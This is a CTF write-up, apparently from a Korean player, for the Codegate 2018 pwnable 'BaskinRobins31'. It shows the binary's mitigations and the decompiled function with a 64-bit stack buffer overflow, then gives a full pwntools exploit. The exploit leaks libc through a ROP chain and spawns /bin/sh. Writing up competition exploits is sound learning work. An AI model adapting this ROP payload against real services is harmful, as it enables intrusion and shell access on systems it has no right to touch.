Codegate2018 - BaskinRobins31

BaskinRobins31

간단한 64비트 버퍼오버플로우입니다.

Mitigation

ihaechan@ubuntu:~/Desktop$ ./pwnable/checksec.sh --file ./BaskinRobins31
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   ./BaskinRobins31
ihaechan@ubuntu:~/Desktop$

vulnerability

signed __int64 __fastcall your_turn(_DWORD *a1)
{
  signed __int64 result; // rax
  char s; // [rsp+10h] [rbp-B0h]
  size_t n; // [rsp+B0h] [rbp-10h]
  int v4; // [rsp+BCh] [rbp-4h]
​
  v4 = 0;
  memset(&s, 0, 0x96uLL);
  puts("How many numbers do you want to take ? (1-3)");
  n = read(0, &s, 0x190uLL);   // stack buffer overflow
  write(1, &s, n);
  putchar(10);
  v4 = strtoul(&s, 0LL, 10);
  if ( check_decision(v4, 0LL) )
  {
    *a1 -= v4;
    result = 1LL;
  }
  else
  {
    puts("Don't break the rules...:( ");
    result = 0LL;
  }
  return result;
}

그냥 간단한 버퍼오버플로우 입니다.

exploit

from pwn import *
​
s = process("/home/ihaechan/Desktop/BaskinRobins31")
#s = remote("ch41l3ng3s.codegate.kr",3131)
​
print s.recvuntil("There are 31 number(s)")
print s.recvuntil("How many numbers do you want to take ? (1-3)")
​
magic = 0x040087A
​
write_plt = 0x4006d0
write_got = 0x602028
​
payload = "2\n"
payload +="\x90"*0xae + "\x90"*8
payload += p64(magic)
payload += p64(1)
payload += p64(write_got)
payload += p64(8)
payload += p64(write_plt)
payload += p64(0x4008A4)
​
s.send(payload)
print s.recv(1024)
s.recvuntil(p64(0x4006d0))
libc_leak = u64(s.recvuntil("\x7f")[-6:] + "\x00"*2) - 0xf72b0
print "libc_base : " + hex(libc_leak)
​
print s.recvuntil("How many numbers do you want to take ? (1-3)")
​
payload2 = "\x90"*0xb0+"\x90"*8
payload2 += p64(magic)
payload2 += p64(0)
payload2 += p64(0x602079)
payload2 += p64(0x10)
payload2 += p64(0x400700)
​
payload2 += p64(magic)
payload2 += p64(0x602079)
payload2 += p64(0) + p64(0)
payload2 += p64(libc_leak + 0x45390)
​
s.send(payload2)
​
s.send("/bin/sh\x00")
s.interactive()